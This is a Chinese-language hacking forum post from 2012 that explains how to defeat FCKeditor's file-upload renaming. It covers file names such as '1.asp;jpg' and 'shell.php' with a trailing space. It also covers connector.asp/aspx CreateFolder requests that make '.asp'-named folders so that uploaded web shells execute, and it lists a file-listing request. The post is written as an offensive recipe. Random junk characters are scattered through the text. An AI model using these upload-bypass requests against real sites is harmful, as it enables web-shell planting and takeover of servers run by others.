中国网络渗透测试联盟

标题: FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破 [打印本页]
作者: admin    时间: 2012-12-31 09:27
标题: FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破
很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
! C- V# g- U* T- L7 W+ c0 D% `" K* A( a+ s2 k
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
" m7 E: u& ?# _* }5 U( M: i; ?) t8 o& s1 n* `3 z
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。# c/ w$ s& O/ i5 G3 F1 |

8 J( V, k1 v6 g+ I" X突破建立文件夹:8 ]( W5 D, P6 v& j! l3 W
# a6 O& |/ u7 F4 S. l
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp. B& {' L- K) ~: j/ h  h
2 n% V- E( V8 J$ P
参数:
; N+ V# J* ~2 q$ n2 V6 W8 k9 n3 K9 L
, P* }4 j# n" \+ k/ J: I* r当前目录名:CurrentFolder=/qing.asp" g# L$ Z  i+ M/ [) m" ?: s4 m
( s9 i  l. D6 R3 G0 X
新的目录名:NewFolderName=x.asp( S2 \2 Z0 y. W0 H; q. K# ?
# W) Z  `. e8 I8 z5 E9 s( M
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
6 }5 Q) U9 n2 Q5 Q) p1 N5 ]. q8 Q
* [9 w0 L7 V" z  ]. B4 K! O3 F( G那么 x.asp 就已经建立生成了,此方法百试百灵!
6 J4 A+ e% O+ y8 C7 h3 v! p- @6 E4 a. C
新建文件夹参数 x.asp,基本都能搞定。
/ X& @! ^, ]3 [5 ?* G% a7 {
) R& A6 @4 }# @6 r/ A) K下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
4 t' u: M  q/ `8 {5 M( Y5 H3 M9 }7 x5 C7 M$ H$ f/ n
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
0 a  T- w! h# U: n; T% m4 J. N% |5 N+ x# j/ c, |
获取文件列表. u: Y* ^( O5 i- g- ^  F1 }
       aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F) Q' g% _3 H) n- [9 F; ~) W% _! L1 `

* c1 A5 o7 E+ e- ^  h



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2